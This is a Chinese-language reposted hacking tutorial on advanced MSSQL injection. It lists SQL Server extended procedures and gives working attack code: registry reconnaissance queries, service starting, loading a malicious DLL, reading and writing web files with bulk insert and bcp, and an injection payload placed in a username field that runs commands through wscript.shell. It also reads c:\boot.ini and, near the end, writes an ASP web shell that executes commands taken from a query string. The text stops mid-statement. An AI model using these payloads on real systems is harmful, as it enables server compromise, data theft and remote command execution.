鉴于大家对asp十分关注,我们编辑小组在此为大家搜集整理了“Mssql高级注入笔记II”一文,供大家参考学习
一些sql扩展
xp_regaddmultistring
xp_regdeletekey 删除键名
xp_regdeletevalue 删除键值
xp_regenumkeys 枚举
xp_regenumvalues
xp_regread 对于
xp_regremovemultistring
xp_regwrite 写
xp_availablemedia 查看驱动器
xp_dirtree 看目录
xp_enumdsn ODBC数据源
xp_loginconfig 一些服务器安全配置的信息
xp_makecab 打包,某些dbo权限先可做大用
xp_ntsec_enumdomains 枚举域名相关信息
xp_terminate_process 终端进程和ip啦
xp_logininfo 当前登录帐号
sp_configure 检索数据库中的内容(我觉得这个挺有用的)
sp_helpextendedproc 得到所有的存储扩展
sp_who2
查询用户,他们登录的主机,他们在数据库中执行的操作等等
一些网络信息
exec xp_regread HKEY_LOCAL_MACHINE,
''SYSTEM\CurrentControlSet\Services\lanmanserver\parameters'',
''nullsessionshares''
SNMP辅助网络踩点
exec xp_regenumvalues HKEY_LOCAL_MACHINE,
''SYSTEM\CurrentControlSet\Services\snmp\parameters\validcomm
unities''
开始一些系统服务,比如telnet,前提希望可以跑来admin或者一些系统密码
exec master..xp_servicecontrol ''start'', ''schedule''
exec master..xp_servicecontrol ''start'', ''server''
Sp_addextendedproc ''xp_webserver'',''c:\temp\xp_foo.dll'' 此扩展可以运行
程序 使用''bulk insert''语法可以将一个文本文件插入到一个临时表中。简单地创建这个表:
create table foo( line varchar(8000) )
然后执行bulk insert操作把文件中的数据插入到表中,如:
bulk insert foo from ''c:\inetpub\wwwroot\admin\inc.asp''
bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar
''S''参数为执行
查询的服务器,''U''参数为用户名,''P''参数为密码,这里为''foobar''
SQL SERVER中提供了几个内置的允许创建ActiveX自动执行脚本的存储过程。这些脚本和运行在windows脚本解释器下的脚本,或者ASP脚本
程序一样——他们使用VBScript或JavaScript书写,他们创建自动执行对象并和它们交互。一个自动执行脚本使用这种方法书写可以在Transact-SQL中做任何在ASP脚本中,或者WSH脚本中可以做的任何事情
使用''wscript.shell''对象建立了一个记事本的实例:
declare @o int
exec sp_oacreate ''wscript.shell'',@o out
exec sp_oamethod @o,''run'',NULL,''notepad.exe''
指定在用户名后面来执行它:
Username:''; declare @o int exec sp_oacreate ''wscript.shell'',@o out exec sp_oamethod @o,''run'',NULL,''notepad.exe''—
使用FSO读一个已知的文本文件:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ''scripting.filesystemobject'', @o out
exec sp_oamethod @o, ''opentextfile'', @f out, ''c:\boot.ini'', 1
exec @ret = sp_oamethod @f, ''readline'', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ''readline'', @line out
end
创建了一个能执行通过提交的命令,默认是asp那组权限的用户下运行,前提是sp_oacreate扩展存在
declare @o int, @f int, @t int, @ret int
exec sp_oacreate ''scripting.filesystemobject'', @o out
exec sp_oamethod @o, ''createtextfile'', @f out,
''c:\inetpub\wwwroot\foo.asp'', 1
exec @ret = sp_oamethod @f, ''writeline'', NULL,
''<% set o = server.createobject("wscript.shell"): o.run(
request.querystring("cmd") ) %>''
sp_who ''1'' select * from syso